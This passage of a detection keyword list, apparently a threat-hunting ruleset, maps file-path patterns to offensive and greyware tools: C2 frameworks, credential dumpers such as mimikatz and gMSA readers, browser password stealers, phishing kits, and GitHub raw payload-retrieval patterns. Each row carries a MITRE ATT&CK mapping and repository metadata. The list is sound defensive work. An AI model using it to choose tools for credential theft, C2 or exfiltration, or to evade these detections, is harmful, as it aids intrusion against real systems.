+"*/github.com/*/raw/main/*.teamserver*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.temp*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.tgz*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.tmp*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.vb*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.vbs*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.vbscript*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive 
!","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.ws*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.wsf*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.wsh*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.X86*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.X86_64*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.xlam*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.xlm*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool 
- risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.xlsm*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.zip*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/GithubC2.git*","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","1","N/A","10","10","115","29","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z" +"*/gkrellm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/glit.git*","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","1","N/A","8","1","34","6","2022-11-28T20:42:23Z","2022-11-14T11:25:10Z" +"*/glit-cli*","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","34","6","2022-11-28T20:42:23Z","2022-11-14T11:25:10Z" 
+"*/glit-core*","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","34","6","2022-11-28T20:42:23Z","2022-11-14T11:25:10Z" +"*/globeimposter.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" +"*/gmailC2.exe*","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","1","N/A","10","10","242","40","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" 
+"*/gMSA_dump_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/gMSADumper*","offensive_tool_keyword","gMSADumper","Lists who can read any gMSA password blobs and parses them if the current user has access.","T1552.001 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/micahvandeusen/gMSADumper","1","1","N/A","N/A","2","190","34","2023-08-23T13:32:49Z","2021-04-10T00:15:24Z" +"*/GMSAPasswordReader.git*","offensive_tool_keyword","GMSAPasswordReader","Reads the password blob from a GMSA account using LDAP and parses the values into hashes for re-use.","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/rvazarkar/GMSAPasswordReader","1","1","N/A","7","2","103","23","2023-02-17T14:37:40Z","2020-01-19T19:06:20Z" +"*/gobuster.git*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*/gobuster/*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*/gobusterdir/*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting 
tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*/gobusterdns/*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*/gobustergcs/*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*/gocrack.git*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","1","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" +"*/gocrack/.hashcat*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" +"*/gocrack/server*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" 
+"*/gocrack_server*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" +"*/gocrack_worker*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" +"*/gocrack-1.0.zip*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" +"*/goDoH.git*","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","701","122","2023-02-25T06:31:07Z","2018-10-23T07:24:04Z" +"*/godoh/*","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","701","122","2023-02-25T06:31:07Z","2018-10-23T07:24:04Z" +"*/GoFetch.git*","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Exploitation tools - AD Enumeration","https://github.com/GoFetchAD/GoFetch","1","1","N/A","10","7","615","126","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z" +"*/golang_c2.git*","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1043 - T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","1","N/A","10","10","4","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z" +"*/GoldenGMSA.git*","offensive_tool_keyword","GoldenGMSA","GolenGMSA tool for working with GMSA passwords","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/Semperis/GoldenGMSA","1","1","N/A","7","2","113","17","2023-07-03T09:35:48Z","2022-02-03T10:32:05Z" +"*/goMatrixC2.git*","offensive_tool_keyword","goMatrixC2","C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.","T1090 - T1027 - T1071","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/n1k7l4i/goMatrixC2","1","1","N/A","10","10","0","2","2023-09-11T10:20:41Z","2023-08-31T09:36:38Z" +"*/go-mimikatz*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/vyrus001/go-mimikatz","1","1","N/A","10","6","593","105","2022-09-08T18:14:20Z","2015-10-22T08:43:38Z" +"*/GONET-Scanner/*","offensive_tool_keyword","GONET-Scanner","port scanner and arp discover in go","T1595","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/luijait/GONET-Scanner","1","1","N/A","N/A","1","72","18","2022-03-10T04:35:58Z","2022-02-02T19:39:09Z" +"*/GoodSync-vsub-Setup.exe*","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","1","N/A","9","10","N/A","N/A","N/A","N/A" +"*/goPassGen.git*","offensive_tool_keyword","goPassGen","Easily-guessable Password Generator for Password Spray Attack","T1110 - T1110.003","TA0006 ","N/A","N/A","Exploitation tools","https://github.com/bigb0sss/goPassGen","1","1","N/A","8","1","20","3","2020-06-04T23:13:44Z","2020-06-04T22:33:37Z" +"*/gopher-ls.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/gophish.db*","offensive_tool_keyword","gophish","Open-Source Phishing Toolkit","T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/gophish/gophish","1","1","N/A","10","10","9759","1877","2023-09-28T02:03:58Z","2013-11-18T23:26:43Z" +"*/gophish/*","offensive_tool_keyword","gophish","Open-Source Phishing Toolkit","T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/gophish/gophish","1","1","N/A","10","10","9759","1877","2023-09-28T02:03:58Z","2013-11-18T23:26:43Z" +"*/gorsair.go*","offensive_tool_keyword","Gorsair","Gorsair hacks its way into remote docker containers that expose their APIs","T1552","TA0006","N/A","N/A","Exploitation tools","https://github.com/Ullaakut/Gorsair","1","1","N/A","N/A","9","825","74","2023-09-09T13:18:33Z","2018-08-02T16:49:14Z" +"*/go-secdump.git*","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","1","N/A","10","1","82","7","2023-05-02T15:01:10Z","2023-02-23T17:02:50Z" +"*/gosecretsdump*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" 
+"*/Gotato.git*","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","1","N/A","9","2","114","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" +"*/gotato.go*","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","1","N/A","9","2","114","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" +"*/goZulipC2.git*","offensive_tool_keyword","goZulipC2","C2 leveraging Zulip Messaging Platform as Backend.","T1090 - T1090.003 - T1071 - T1071.001","TA0011 - TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","1","N/A","10","10","5","2","2023-08-31T12:06:58Z","2023-08-13T11:04:20Z" +"*/GPOddity.git*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","1","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*/GPOddity/*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","1","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*/gpp_autologin.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential 
Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/gpp_password.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/gpp-decrypt*","offensive_tool_keyword","gpp-decrypt","Decrypt the given Group Policy Preferences","T1552.002 - T1212","TA0009 - TA0006","N/A","N/A","Credential Access","https://gitlab.com/kalilinux/packages/gpp-decrypt","1","1","N/A","6","10","N/A","N/A","N/A","N/A" +"*/gpsd-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/GreatSCT/*","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" +"*/GreatSCT/GreatSCT*","offensive_tool_keyword","GreatSCT","GreatSCT is a tool designed to generate metasploit payloads that bypass common anti-virus solutions and application whitelisting solutions. 
GreatSCT is current under support by @ConsciousHacker","T1027 - T1055 - T1566 - T1218","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/GreatSCT/GreatSCT","1","0","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" +"*/greatsct-output*","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" +"*/Group3r.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*/Grouper2.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*/GruntHTTP.exe*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/gtfobins.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*/gtfobins.py*","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007","TA0007 - TA0003 - TA0002 - TA0009 - TA0040 - TA0010","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","1","N/A","N/A","10","2262","488","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" +"*/guervild/BOFs*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*/guessed_emails.txt*","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source 
intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","N/A","6","10","1221","192","2023-09-11T05:26:53Z","2019-08-07T14:32:53Z" +"*/gyaansastra/CVE-2022-0847*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0008","N/A","N/A","Exploitation tools","https://github.com/gyaansastra/CVE-2022-0847","1","1","N/A","N/A","1","1","2","2022-03-20T15:46:04Z","2022-03-09T15:44:58Z" +"*/GzipB64.exe*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*/h8mail/*","offensive_tool_keyword","h8mail","Powerful and user-friendly password hunting tool.","T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001","TA0010","N/A","N/A","Information Gathering","https://github.com/opencubicles/h8mail","1","1","N/A","N/A","1","9","5","2019-08-19T09:46:33Z","2019-08-19T09:45:32Z" +"*/HackBrowserData*","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tools","https://github.com/moonD4rk/HackBrowserData","1","1","N/A","N/A","10","8730","1373","2023-10-02T14:38:41Z","2020-06-18T03:24:31Z" +"*/hackerid.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 
